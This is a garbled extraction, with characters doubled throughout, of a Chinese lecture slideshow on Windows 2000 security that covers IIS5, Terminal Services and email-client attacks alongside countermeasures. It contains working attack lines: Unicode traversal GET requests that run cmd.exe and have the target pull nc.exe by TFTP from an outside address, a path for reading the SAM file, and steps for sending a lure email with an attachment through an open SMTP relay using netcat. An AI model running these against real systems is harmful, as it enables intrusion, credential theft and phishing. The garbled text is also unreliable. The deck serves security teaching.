Windows2000系统安全(2)-网络与信息安全课件.pptx

《Windows2000系统安全(2)-网络与信息安全课件.pptx》由会员分享，可在线阅读，更多相关《Windows2000系统安全(2)-网络与信息安全课件.pptx（115页珍藏版）》请在淘文阁 - 分享文档赚钱的网站上搜索。

1、Win2k系统安全系统安全(2)E-mail: 目目 录录1.IIS5的安全的安全2.终端服务器安全终端服务器安全3.Microsoft Internet 客户端的安全客户端的安全4.物理攻击物理攻击5.拒绝服务攻击拒绝服务攻击6.安全功能和工具安全功能和工具IIS5的安全的安全IIS5IIS5基础基本基础基本HTTPHTTPHTTPHTTP：基于文本的无状态文件传输协议：基于文本的无状态文件传输协议虚虚拟拟目目录录：filesfiles映映射射到到该该系系统统磁磁盘盘的的一一个个实实际际目目录录上上，如如c:inetpubfilesc:inetpubfiles对于服务器而言则形成如下的请求：

2、对于服务器而言则形成如下的请求：GET/HTTP/1.0GET/HTTP/1.0若若该该文文件件存存在在，则则服服务务器器会会向向客客户户端端推推送送该该文文件件并并在在客客户户端的浏览器上显示；否则会有各种错误代码端的浏览器上显示；否则会有各种错误代码IIS5IIS5基础基础CGICGICGICGI：CommonCommonGatewayGatewayInterfaceInterface，运运行行在在服服务务器器上上的的应应用用程程序序，能针对每个请求生成动态的内容，扩展了能针对每个请求生成动态的内容，扩展了WebWeb功能功能调用调用CGICGIcgi.exe?var1+var2cgi.e

3、xe?var1+var2WindowsWindows中中几几乎乎所所有有的的可可执执行行程程序序都都可可以以作作为为服服务务器器端端的的CGICGI应应用程序来执行用程序来执行其中其中cmd.execmd.exe经常被作为寻找的目标经常被作为寻找的目标IIS5IIS5基础基础ASPASP和和ISAPIISAPIASPASP：ActiveServerPagesActiveServerPagesISAPI:ISAPI:InterfaceInterfaceServerServerApplicationApplicationProgrammingProgrammingInterfaceInterfac

4、e调用调用ASPASPscript.asp?var1=x&var2=yscript.asp?var1=x&var2=y调用调用ISAPIISAPIisapi.dll?var1&var2isapi.dll?var1&var2HTTPHTTP攻击伎俩攻击伎俩使用使用././进行文件系统遍历进行文件系统遍历URLURL的十六进制编码的十六进制编码使用使用././进行文件系统遍历进行文件系统遍历通通常常是是在在目目录录上上设设置置不不当当的的NTFSNTFS访访问问控控制制列列表表所所导导致的致的samsamURLURL的十六进制编码的十六进制编码HttpHttp允许允许URLURL中使用十六进制编码

5、形式输入字符串中使用十六进制编码形式输入字符串利用利用URLURL的十六进制编码攻击的十六进制编码攻击samsam 2F2F2E2E2E2E2F2F2E2E2E2E2Fwinnt/repair/2Fwinnt/repair/samsam能能避避免免入入侵侵检检测测系系统统的的检检测测，或或可可以以导导致致应应用用程程序序错错误误处处理理输输入入IIS5IIS5缓冲区溢出缓冲区溢出IPPIPP缓冲区溢出缓冲区溢出索引服务索引服务ISAPIISAPI扩展缓冲区溢出扩展缓冲区溢出CodeRedCodeRed蠕虫蠕虫ida/idqida/idq缓冲区溢出缓冲区溢出FrontPage2000FrontP

6、age2000服务器扩展缓冲区溢出服务器扩展缓冲区溢出安全对策安全对策在系统驱动器之外的驱动器上安装在系统驱动器之外的驱动器上安装WebWeb文件夹文件夹WebWeb服务器所在的卷应使用服务器所在的卷应使用NTFSNTFS并谨慎设置并谨慎设置ACLACL移动、删除或改名可能被利用的可执行文件：移动、删除或改名可能被利用的可执行文件：cacls,xcaclscacls,xcacls在在服服务务器器的的WriteWrite和和ExecuteExecute ACLACL中中删删除除EveryoneEveryone和和UsersUsersGroupGroup掌握对日志中攻击标志的分析掌握对日志中攻击标

7、志的分析将文件写入将文件写入WebWeb服务器服务器如在目标机上建立如在目标机上建立tftptftp服务器，然后上载文件：服务器，然后上载文件：GET/scripts/.%c0%af./winnt/system32/t?“-GET/scripts/.%c0%af./winnt/system32/t?“-i”+192.168.234.31+GET+nc.exec:nc.exeHTTP/1.0i”+192.168.234.31+GET+nc.exec:nc.exeHTTP/1.0 将将netcatnetcat写写入入到到C:C:，因因为为默默认认情情况况下下所所有有用用户户对对C:C:具具有有写写

8、权限权限如将目标机器上如将目标机器上cmd.execmd.exe改名为改名为cmdl.execmdl.exe GETGET/scripts/.%c0%af./winnt/system32/cmd.exe?+copy+/scripts/.%c0%af./winnt/system32/cmd.exe?+copy+c:winntsystem32cmd.exe+c:cmdl.exeHTTP/1.0c:winntsystem32cmd.exe+c:cmdl.exeHTTP/1.0其它自动上载工具：如其它自动上载工具：如unicodeloaderunicodeloader等等通过通过IIS5IIS5提升权

9、限提升权限通过通过InProcesslsapiAppsInProcesslsapiApps利用利用RevertToSelfRevertToSelf 安装安装MS01-026MS01-026补丁可以解决补丁可以解决源代码泄漏攻击源代码泄漏攻击起因起因IISIIS中的程序缺陷中的程序缺陷低劣的低劣的WebWeb编程技术编程技术常见的漏洞常见的漏洞+.htr(ism.dll)+.htr(ism.dll)Webhits(webhits.dll)Webhits(webhits.dll)Translate:f(WebDAV,httpext.dll)Translate:f(WebDAV,httpext.dl

10、l)WebDAVWebDAV目录列表（目录列表（httpext.dll)httpext.dll)WebWeb服务器安全评估工具服务器安全评估工具StealthHTTPScannerStealthHTTPScannerSSLProxySSLProxyAchillesAchillesWfetchWfetchWhiskerWhiskerWebWeb服务器安全忠告服务器安全忠告在在路路由由器器、防防火火墙墙或或其其它它位位于于WebWeb服服务务器器周周边边位位置置的的设设备备上上应应用网路级的访问控制用网路级的访问控制在主机级，阻塞在主机级，阻塞WebWeb服务器上所有不必要的流入和流出连接服务器上

11、所有不必要的流入和流出连接随时安装热修复：随时安装热修复：删除不必要的脚本映射和不使用的删除不必要的脚本映射和不使用的ISAPIISAPI应用程序应用程序DLLDLL禁用不必要的服务禁用不必要的服务在在应应用用WebWeb服服务务之之前前，强强烈烈推推荐荐使使用用SecuritySecurityTemplateTemplate来来对对其进行配置其进行配置WebWeb服务器安全忠告服务器安全忠告在系统卷之外建立一个独立的卷来存放在系统卷之外建立一个独立的卷来存放WebWeb根目录根目录WebWeb服务器所在的卷应使用服务器所在的卷应使用NTFSNTFS文件系统，明确的设置文件系统，明确的设置AC

12、LACL删删除除EveryoneEveryone、UsersUsers和和其其它它非非特特权权组组所所在在目目录录上上的的写写文文件件和和执行文件权限执行文件权限不要将私有数据保存在不要将私有数据保存在ASPASP文件或包含有文件中文件或包含有文件中停停止止AdministrationAdministrationWebWeb站站点点，删删除除IISAdminIISAdmin和和IISHelpIISHelp虚虚拟拟目录以及它们对应的真实目录目录以及它们对应的真实目录 目目 录录1.IIS5的安全的安全2.终端服务器安全终端服务器安全3.Microsoft Internet 客户端的安全客户端的安

13、全4.物理攻击物理攻击5.拒绝服务攻击拒绝服务攻击6.安全功能和工具安全功能和工具终端服务器安全终端服务器安全TSWindowsWindows20002000提提供供了了交交互互式式的的图图形形化化远远程程shellshell，称称为为终终端端服服务务(TerminalService(TerminalService，TS)TS)，适用于远程管理或应用程序共享，适用于远程管理或应用程序共享引引用用的的说说法法，“Windows“Windows20002000终终端端服服务务使使你你能能够够从从各各种种设设备备上上，通通过过几几乎乎任任何何类类型型的的网网络络连连接接远远程程的的基基于于Windo

14、wsWindows20002000的的服服务务器，并在其上远程执行应用程序器，并在其上远程执行应用程序”TSTSTS紧紧密密集集成成在在操操作作系系统统内内部部，免免费费提提供供远远程程管管理理模模式式(最多有两个同时连接的会语以及一个控制台最多有两个同时连接的会语以及一个控制台)TSTS可可以以在在你你和和服服务务器器之之间间提提供供不不同同的的认认证证和和加加密密方方法法。对对WindowsWindows20002000来来说说，终终端端服服务务器器正正在在逐逐渐渐成成为为与与UNIXUNIX世界中的世界中的SSHSSH一样重要的图形化产品一样重要的图形化产品TS的代价的代价在在本本节节中

15、中，我我们们将将从从安安全全的的角角度度来来考考查查TSTS的的基基本本功功能能、如如何何识识别别和和枚枚举举TSTS、解解决决不不合合理理的的TSTS实实现现的的问问题题、已已知知的的针针对对TSTS的的攻攻击击，以以及及在在网网络络环环境境中中保保护护和和管管理理TSTS的基本知识的基本知识TS组件组件服务器服务器远程桌面协议远程桌面协议(RemoteDesktopProtocol(RemoteDesktopProtocol，RDP)RDP)客户端客户端TS服务器服务器TSTS集集成成在在所所有有WindowsWindows20002000服服务务器器中中，通通过过控控制制面面板板中中的的

16、WindowsWindows组件功能可以很容易地启用和禁用组件功能可以很容易地启用和禁用在在以以管管理理模模式式安安装装时时，服服务务器器是是标标准准的的组组件件；当当作作为为远远程应用程序服务器时，它需要额外的授权费用和架构程应用程序服务器时，它需要额外的授权费用和架构服服务务器器的的默默认认监监听听端端口口为为TCPTCP33893389(稍稍后后将将会会介介绍绍自自行行指定端口是很容易的指定端口是很容易的)远程桌面协议远程桌面协议(RDP)在在客客户户端端和和服服务务器器之之间间的的数数据据传传输输是是通通过过MicrosoftMicrosoft的的基于基于TCPTCP的远程桌面协议的远

17、程桌面协议(RDP-5)(RDP-5)进行的进行的RDPRDP提提供供了了三三层层加加密密以以确确保保点点对对点点数数据据传传输输的的安安全全性性：4040、5656或或128128位位RC4RC4与与WindowsWindowsNTNT版版本本的的RDP-4RDP-4相相比比，WindowsWindows20002000提提供供了了更更多多的的基基本本功功能能，可可以以在在大大多多数数的的网网络络环环境境中中高高效效的的使使用用客户端客户端通通过过MSMS安安装装程程序序(MSI)(MSI)软软件件包包安安装装的的独独立立的的1616位位或或3232位位可可执执行行文件文件终终端端服服务务高

18、高级级客客户户端端(Terminal(TerminalServicesServicesAdvancedAdvancedAlientAlient，TSAC)TSAC)，基于，基于Win32Win32的的ActiveXActiveX控件，可以在控件，可以在WebWeb页面中使用页面中使用MMCMMC管理单元管理单元尽尽管管它它们们互互相相之之间间存存在在明明显显的的区区别别，但但各各种种不不同同的的客客户户端端都都用用完完全全相相同同的的方方法法来来实实现现RDPRDP。因因此此，尽尽管管它它们们看看起起来来似似乎乎不不一一样样，但但所所有有的的TSTS客客户户端端在与服务器进行对话时都以完全相同

19、的方式进行操作在与服务器进行对话时都以完全相同的方式进行操作修改修改TSTS监听端口服务器端监听端口服务器端通通过过修修改改下下面面的的注注册册表表键键值值，TSTS的的默默认认端端口口可可以以重重新新指定指定 HKLMSystemCurrentControlSetControl Terminal Server WinStationsRDP-Tcp键值：键值：PortNumber REG_DWORD=3389修改修改TSTS监听端口客户端监听端口客户端第一步是在第一步是在TSTS客户端连接管理器中与目标主机建立连接客户端连接管理器中与目标主机建立连接一一旦旦创创建建了了一一个个连连接接之之后后

20、，选选定定该该连连接接并并从从FileFile菜菜单单中中选选择择ExportExport，将将全全部部配配置置设设置置保保存存到到以以一一个个CNSCNS为为扩扩展展名名的的文文本文件中去本文件中去使使用用文文本本编编辑辑器器打打开开这这个个文文件件，将将ServerServerPortPort修修改改为为在在服服务器上指定端口，如下例所示务器上指定端口，如下例所示(自定义连接端口为自定义连接端口为7777)7777)修改修改TSTS监听端口客户端监听端口客户端CorpTermServWinPosStr=0,2,0,0,941,639Expand=1Smooth Scrolling=0Sha

21、dow Bitmap Enabled=1Dedicated Terminal=0Server Port=7777Enable Mouse=1etc.识别和查找识别和查找TSTS33893389端口扫描端口扫描TSProbeTSProbeTSEnumTSEnum 攻击攻击TSTS密码猜测攻击密码猜测攻击用户权限提升用户权限提升畸形畸形RDPRDP拒绝服务攻击拒绝服务攻击 密码猜测攻击密码猜测攻击-TSGrinder.exe-TSGrinder.exeTSTS登登 录录 等等 价价 于于 真真 正正 的的 交交 互互 式式 登登 录录，因因 此此 对对 真真 正正 的的AdministratorA

22、dministrator账账户户是是不不能能设设置置锁锁定定阈阈值值的的。这这意意味味着着在在启启用用了了TSTS服服务务的的情情况况下下，对对密密码码猜猜测测攻攻击击来来说说，本本地地AdministratorAdministrator账户是一个最易受攻击的目标账户是一个最易受攻击的目标TimTimMullenMullen开开发发了了TSGrinderTSGrinder的的工工具具，它它能能够够通通过过TSTS对对本本地地AdministratorAdministrator账户进行字典攻击账户进行字典攻击密码猜测攻击密码猜测攻击-TSGrinder.exe-TSGrinder.exeTSGr

23、inderTSGrinder使使 用用 TSTS的的 ActiveXActiveX控控 件件 来来 进进 行行 攻攻 击击。尽尽 管管 这这 个个ActiveXActiveX控控件件经经过过特特殊殊的的设设计计可可以以拒拒绝绝对对密密码码方方法法的的脚脚本本访访问问，但但通通过过C+C+中中的的vtablevtable绑绑定定仍仍然然可可以以访访问问ImsTscNonScriptableImsTscNonScriptable接接口口方方法法。这这允允许许为为该该控控件件编编写写自自定定义义的的接接口口，于于是是攻攻击击者者就就可以对可以对AdministratorAdministrator账户

24、进行密码猜测，直至猜测出密码账户进行密码猜测，直至猜测出密码上提供下载上提供下载 密码猜测攻击的防御密码猜测攻击的防御推荐将本地推荐将本地AdministratorAdministrator账户改名账户改名防防御御TSTS密密码码猜猜测测攻攻击击的的另另一一种种有有趣趣的的方方法法是是为为WindowsWindows登登录录窗窗口口制制作作一一个个自自定定义义的的法法律律声声明明，通通过过添添加加或或编编辑如下的注册表键值就可以实现：辑如下的注册表键值就可以实现：HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionWinLogon 用户权限提升用户权限提升推

25、推荐荐实实现现WindowsWindows20002000ResourceResourceKitKit中中的的一一些些关关键键功能功能其其中中最最重重要要的的是是，“Appsec”“Appsec”可可以以使使管管理理员员能能够够限限制制用户只能运行特定的应用程序用户只能运行特定的应用程序这这能能够够减减小小攻攻击击者者在在获获取取本本地地用用户户访访问问之之后后进进行行权权限限提升攻击的危险提升攻击的危险 IMEIME远程远程RootRoot获取获取输输入入法法编编辑辑器器(Input(InputMethodMethodEditorEditor，IME)IME)漏漏洞洞，这这个个漏漏洞洞导导致

26、可以不用提供任何凭据就能通过致可以不用提供任何凭据就能通过TSTS的认证的认证IMEIME用用来来将将标标准准的的101101键键键键盘盘映映射射到到某某种种语语言言中中的的大大量量可可用用字字符符，例例如如日日语语、中中文文和和韩韩国国语语都都需需要要IMEIME。虽虽然然IMEIME通通常常在在本本地地用用户户的的上上下下文文中中进进行行正正常常操操作作，但但登登录录时时，IMEIME却却在在SYSTEMSYSTEM上上下下文文中中运运行行。这这使使得得通通过过远远程程服服务务器器的的登登录录屏屏幕幕运运行行精精心心设设计计的的命命令成为可能令成为可能IMEIME对策对策只只有有简简体体中

27、中文文版版系系统统或或在在初初始始安安装装过过程程中中安安装装了了简简体体中文中文IMEIME的系统才会有这个漏洞的系统才会有这个漏洞MicrosoftMicrosoft发发布布的的公公告告MS00-069MS00-069和和补补丁丁能能够够为为所所有有受受影响的版本解决这个问题影响的版本解决这个问题畸形畸形RDPRDP拒绝服务拒绝服务20012001年年1 1月月，YoichiYoichi UbukataUbukata和和YoshihiroYoshihiro KawabataKawabata发发现现了了RDPRDP中中的的一一个个漏漏洞洞，这这个个漏漏洞洞可可能能导导致致拒拒绝绝服服务务的的

28、情情况况出出现现。如如果果攻攻击击者者发发送送一一种种畸畸形形的的报报文文，它它将将使使RDPRDP瘫瘫痪痪。这这种种攻攻击击会会导导致致当当前前正正在在进进行行的的全全部部工作丢失，并且需要重新启动系统才能恢复服务工作丢失，并且需要重新启动系统才能恢复服务MicrosoftMicrosoft发发布布了了一一个个补补丁丁(MS01-006)(MS01-006)，通通过过修修改改终终端端服服务务器器服服务务使使它它正正确确地地处处理理数数据据，从从而而消消除除这这个个漏漏洞洞目目 录录1.IIS5的安全的安全2.终端服务器安全终端服务器安全3.Microsoft Internet 客户端的安全客

29、户端的安全4.物理攻击物理攻击5.拒绝服务攻击拒绝服务攻击6.安全功能和工具安全功能和工具Microsoft Internet客户端安全客户端安全攻击类型攻击类型缓缓冲冲区区溢溢出出，可可被被用用来来执执行行任任意意的的代代码码而而无无需需与与用用户户进进行行任任何何交互交互通通过过欺欺骗骗、强强制制或或暗暗中中执执行行命命令令，使使用用户户运运行行由由攻攻击击者者预预先先选选择的可执行内容。这种方法有以下一些变化：择的可执行内容。这种方法有以下一些变化：巧妙伪装的、看起来无害的电子邮件附件巧妙伪装的、看起来无害的电子邮件附件嵌入在嵌入在HTMLWebHTMLWeb页面或电子邮件中的可执行内容

30、页面或电子邮件中的可执行内容活动内容技术的漏洞导致非法代码的执行活动内容技术的漏洞导致非法代码的执行ActiveXActiveX控件，尤其是那些标记有控件，尤其是那些标记有“可以在脚本中安全使用可以在脚本中安全使用”的控件的控件JavaJava虚拟机的程序缺陷虚拟机的程序缺陷(BrownOrifice)(BrownOrifice)攻击类型攻击类型访问脚本访问脚本/自动化接口，例如自动化接口，例如OutlookOutlook地址簿蠕虫地址簿蠕虫写写本本地地文文件件，通通常常是是在在可可执执行行的的目目录录中中；经经常常通通过过临临时时目目录录或或缓缓存存位位置置的的不不适适当当泄泄露露发发生生。

31、一一旦旦在在本本地地写写入入文文件件，它它就就可可以以执执行行并并运运行行在在本本地地计计算算机机安安全全区区域域的的上上下下文文中中，从从而而是是完完全受到信任的全受到信任的读读取取本本地地文文件件，例例如如通通过过HTMLHTML跨跨帧帧导导航航问问题题或或使使用用IFRAMEIFRAME。这这种种技技术术的的一一个个常常见见结结果果是是从从WebWeb浏浏览览器器的的cookiecookie中中获获取取用用户的密码数据户的密码数据调用客户端出站连接调用客户端出站连接实现实现 Internet客户端攻击客户端攻击恶意恶意WebWeb页面页面客客户户端端的的一一种种最最常常见见形形式式是是在

32、在InternetInternet上上部部署署恶恶意意的的WebWeb服服务器，存放经过精心设计的内容，用来诱骗用户的数据务器，存放经过精心设计的内容，用来诱骗用户的数据这这种种方方法法的的有有效效性性取取决决于于提提高高恶恶意意WebWeb站站点点/页页面面的的访访问问量量，这通常是通过电子邮件或新闻组这通常是通过电子邮件或新闻组/列表文章来进行的列表文章来进行的恶意恶意E-mailE-mail由由于于HTMLHTML功功能能的的多多样样性性(嵌嵌入入小小程程序序或或控控件件、活活动动脚脚本本、跨跨帧帧浏浏览览、内内联联帧帧、cookiecookie解析等等解析等等)，HTMLHTML电子邮

33、件成为理想的攻击媒介电子邮件成为理想的攻击媒介由由于于接接收收端端的的漏漏洞洞导导致致这这样样的的问问题题，MicrosoftMicrosoft虽虽然然备备受受指指责责，然然而而通通过过OutlookOutlook或或OutlookOutlookExpress(OE)Express(OE)这这样样的的程程序序发发送送恶恶意意编编写写的的HTMLHTML却却十十分分困困难难。这这些些图图形形化化的的电电子子邮邮件件客客户户端端不不允允许许对对邮邮件件消消息息的的内内容容进进行行直直接接的的操操作作，而而为实现攻击目的却需要这样做为实现攻击目的却需要这样做如如果果要要在在WindowsWindow

34、s上上模模拟拟这这种种命命令令行行功功能能，可可以以通通过过命命令令行行提提示示符符直直接接向向简简单单邮邮件件传传输输协协议议(Simple(SimpleMailMailTransferTransferProtocolProtocol，SMTP)SMTP)服服务务器器手手动动发发送送消消息息。最最佳佳的的办办法法是是将将适适当当的的SMTPSMTP命命令令和和数数据据写写入入到到一一个个文文本本文文件件中中，然然后后通过管道输入给通过管道输入给netcatnetcatEmailHackingEmailHacking首先，将所需的首先，将所需的SMTPSMTP命令和消息数据写入到一个文件中命令

35、和消息数据写入到一个文件中helo mail from:rcpt to:datasubject:Read this!Importance:highMIME-Version:1.0Content-Type:text/html;charset=us-asciiContent-Transfer-Encoding:7bitHello World!.quitEmailHackingEmailHacking然然后后在在命命令令行行中中将将这这个个文文件件通通过过管管道道传传递递给给netcatnetcat，而而netcatnetcat则则应应该该指指向向适适当的邮件服务器的当的邮件服务器的SMTPSMTP

36、监听端口监听端口2525，例如：，例如：C:type malicious.txt|nc-vv 25EmailHackingEmailHacking恶恶意意的的攻攻击击者者通通常常会会选选择择一一些些提提供供无无限限制制的的SMTPSMTP消消息息中中继继的的不不引引人人注注意意的的邮邮件件服服务务器器，而而且且会会尽尽可可能能隐隐藏藏他他们们自自己己的的源源IPIP地地址址，这这样样就就不不可可能能通过邮件服务器的日志来追查到他们通过邮件服务器的日志来追查到他们这这样样的的“开开放放式式SMTPSMTP中中继继”通通常常被被垃垃圾圾邮邮件件所所利利用用，在在UsenetUsenet的的讨讨论论

37、或或上经常可以找到这样的服务器上经常可以找到这样的服务器EmailHackingEmailHacking如如果果希希望望随随HTMLHTML格格式式的的消消息息发发送送一一个个附附件件，则则必必须须向向消消息息中中添添加加另另一一个个MIMEMIME部分，根据部分，根据MIMEMIME规范规范(RFC2045-49)(RFC2045-49)用用Base64Base64格式对附件进行编码格式对附件进行编码用用以以自自动动完完成成这这项项工工作作的的最最佳佳工工具具是是JohnJohnG.G.MyersMyers的的mpackmpack。mpackmpack能能够够自自动添加正确的动添加正确的MI

38、MEMIME头，这样它的输出就可以直接发送给头，这样它的输出就可以直接发送给SMTPSMTP服务器服务器下下面面的的例例子子使使用用mpackmpack对对一一个个名名为为plant.txtplant.txt的的文文件件进进行行编编码码，输输出出到到文文件件plant.mimplant.mim中。可选的中。可选的-s-s参数用以指定消息的主题行参数用以指定消息的主题行 C:mpack-s Nasty-gram-o plant.mim plant.txtEmailHackingEmailHacking下面将下面将MIMEMIME部分插入到现有的部分插入到现有的HTMLHTML格式的消息中去格式的

39、消息中去对对前前面面的的malicious.txtmalicious.txt来来说说，使使用用“Content-Type:”“Content-Type:”一一行行中中自自定定义义的的MIMEMIME边边界界来来划划分分该该消消息息。MIMEMIME边边界界以以两两个个连连字字符符开开始始，结结束束边边界界以以两两个个连连字字符符为为后后缀缀。还还要要注注意意嵌嵌套套的的“multipart/alternative”MIME“multipart/alternative”MIME部部分分(boundary2)(boundary2)，这这样样OutlookOutlook接接收收者者就就能能够够正正确

40、确地地对对HTMLHTML消消息息正正文文进行解码进行解码一一定定要要十十分分注注意意换换行行的的位位置置，因因为为MIMEMIME的的解解析析根根据据它它们们的的位位置置有有着着很很大大的的不不同同。这这个个消消息息的的重重要要性性被被设设置置为为high(high(高高)，这这是是诱诱使使受受害害者者上上当受骗的一个伎俩当受骗的一个伎俩EmailHackingEmailHackingEmailHackingEmailHacking使使用用管管道道将将这这个个文文件件输输入入给给netcatnetcat，并并发发送送给给开开放放的的SMTPSMTP服服务务器器，就就能能够够向向发发送送一一封

41、封HTMLHTML格格式式的的消消息息，并并包包含含附附件件plant.txtplant.txt要要更更好好地地理理解解多多部部分分消消息息中中的的MIMEMIME边边界界，参参考考RFCRFC20462046的的第第5.1.15.1.1节节。在在OutlookOutlookExpressExpress中中对对收收到到的的消消息息进进行行研研究究，也也可可以以进进一一步步了了解解其其格格式式单单击击PropertiesProperties|DetailsDetails|MessageMessageSourceSource就就可可以以查查看看原原始始数数据据(Outlook(Outlook不允许

42、查看全部的原始不允许查看全部的原始SMTPSMTP数据数据)缓冲区溢出缓冲区溢出如如果果在在每每天天使使用用的的软软件件电电子子邮邮件件客客户户端端中中存存在在缓缓冲冲区区溢溢出出的的漏漏洞洞，那那么么问问题题就就很很可可怕怕了了。在在漏漏洞洞得得到到修修正正之之前前，任任何何使使用用存存在在问问题题的的软软件件的的人人都都将将成为目标成为目标20002000年年7 7月月1818日日；UndergroundUndergroundSecuritySecuritySystemsSystemsResearch(USSR)Research(USSR)公公布布了了GMTGMT令令牌牌缓缓冲冲区区溢溢出

43、出漏漏洞洞，OutlookOutlook和和OutlookOutlookExpress(OE)Express(OE)的的用用户户随随之之发发现现了了这这一一点点。通通过过将将GMTGMT令令牌牌放放在在邮邮件件消消息息的的日日期期字字段段中中并并写写入入一一个个超超长长的的值值，OutlookOutlook和和OEOE就就会会在在POP3POP3和和IMAP4IMAP4下下载载这这样样的的消消息息时时崩崩溃溃。如如果果可可以以发发送送精精心心设计的日期字段，攻击者选定的程序就可以封装在设计的日期字段，攻击者选定的程序就可以封装在GMTGMT值中并执行值中并执行OutlookOutlook用用户

44、户需需要要预预览览、阅阅读读、回回复复或或转转发发这这样样的的消消息息；OEOE用用户户简简单单地地打打开开含含有有该该消消息息的的文文件件夹夹，在在消消息息处处理理时时就就会会自自动动发发生生OEOE就就会会永永久久性性地地崩崩溃溃，除非清除邮箱除非清除邮箱Outlook/OEvCardOutlook/OEvCard缓冲区溢出缓冲区溢出这这个个问问题题最最早早由由JoelJoelMosesMoses发发现现，通通过过打打开开特特定定字字段段中中含含有有大大量量文文本本数数据据的的vCardsvCards，就就可可以以利利用用InternetInternetExplorerExplorer中的

45、缓冲区溢出中的缓冲区溢出vCardsvCards是是19961996年发明的一种电子名片格式，年发明的一种电子名片格式，19981998年进入年进入RFCRFCvCardsvCards以以.vcf.vcf为为文文件件扩扩展展名名。因因为为在在读读取取vCardsvCards时时必必须须解解析析大大量量的的数数据据字字段段，因因此此它它们们成成为为缓缓冲冲区区溢溢出出攻攻击击的的最最佳佳目标目标Outlook/OEvCardOutlook/OEvCard缓冲区溢出缓冲区溢出尽尽管管受受害害者者必必须须显显式式地地运运行行vCardvCard，但但由由于于它它是是一一种种方方便便的的个人数据交换格

46、式，因此大多数人都不会有任何的犹豫个人数据交换格式，因此大多数人都不会有任何的犹豫在在默默认认情情况况下下，OutlookOutlook会会直直接接从从邮邮件件附附件件运运行行vCardsvCards而而不不对对用用户户进进行行提提示示，除除非非安安装装了了OfficeOffice安安全全更更新新。在在直直接接打打开磁盘上的开磁盘上的.vcf.vcf文件时，不会出现提示文件时，不会出现提示Outlook/OEvCardOutlook/OEvCard缓冲区溢出缓冲区溢出vCardsvCards采采用用非非常常简简单单的的ASCIIASCII结结构构，下下面面的的例例子子是是一一个个名名为为Joh

47、nJohnDoe.vcfDoe.vcf的的vCard(vCard(为为了了简简明明起起见见，删删除除了了一一些些可可选选的的字段字段)：Outlook/OEvCardOutlook/OEvCard缓冲区溢出缓冲区溢出如如果果可可选选的的BDAY(BDAY(生生日日)字字段段超超过过5555个个字字符符，运运行行它它就就会会导导致致OutlookOutlook终止并溢出终止并溢出含含有有大大量量文文本本数数据据的的EMAILEMAIL字字段段也也会会导导致致同同样样的的结结果果，而而在在N(N(姓姓名名)字字段中填入大量的文本数据会导致段中填入大量的文本数据会导致OutlookOutlook占用

48、占用99%99%的系统的系统CPUCPU资源资源主主要要的的问问题题似似乎乎在在于于OutlookOutlook的的地地址址簿簿，它它在在试试图图从从vCardvCard导导入入超超长长的的字字段段时时发发生生阻阻塞塞。用用户户将将存存在在问问题题的的vCardvCard复复制制到到他他们们的的Outlook/OEOutlook/OE的的联联系系人人文文件件夹夹中中，通通过过WindowsWindows资资源源管管理理器器，或或通通过过嵌嵌入入在在WebWeb页页面面或电子邮件消息中的链接打开它时，也会发生问题或电子邮件消息中的链接打开它时，也会发生问题其它缓冲区溢出其它缓冲区溢出Window

49、sWindows媒体播放器媒体播放器.asx.asx缓冲区溢出缓冲区溢出GeorgiGeorgiGuninskiGuninski和和RichardRichardSmithSmith发发现现的的ActiveX“SafeActiveX“SafeforScriptingforScripting（脚本安全）（脚本安全）”问题问题AccessAccess数据库实例化数据库实例化IE5IE5中执行中执行VBAVBA代码代码写本地文件写本地文件将将文文件件写写入入本本地地磁磁盘盘，如如果果能能够够写写入入任任意意的的文文件件然然后后又又能能够够执执行行它它们们，那那么么麻麻烦烦就就大大了了。如如果果文文件件

50、已已经经写写入入到到磁磁盘盘上上，那那么么只只有有文文件件系系统统ACLACL和和它它们们与与用用户户账账户户权权限限的的交交集集能能够够确确定定哪哪些些能能够够被被执执行行而而哪哪些些不不能能，因此只要过了第一关，第二步就很容易了。因此只要过了第一关，第二步就很容易了。这这种种攻攻击击的的一一种种聪聪明明的的变变种种是是识识别别磁磁盘盘上上可可以以可可靠靠地地写写入入数数据据的的静静态态位位置置例例如如，InternetInternet临临时时缓缓存存文文件件的的名名称称和和位位置置是是可可以以预预测测的的。这这使使得得攻攻击击者者可可以以实实现现“选选定定文文件件内内容容”攻攻击击，在在文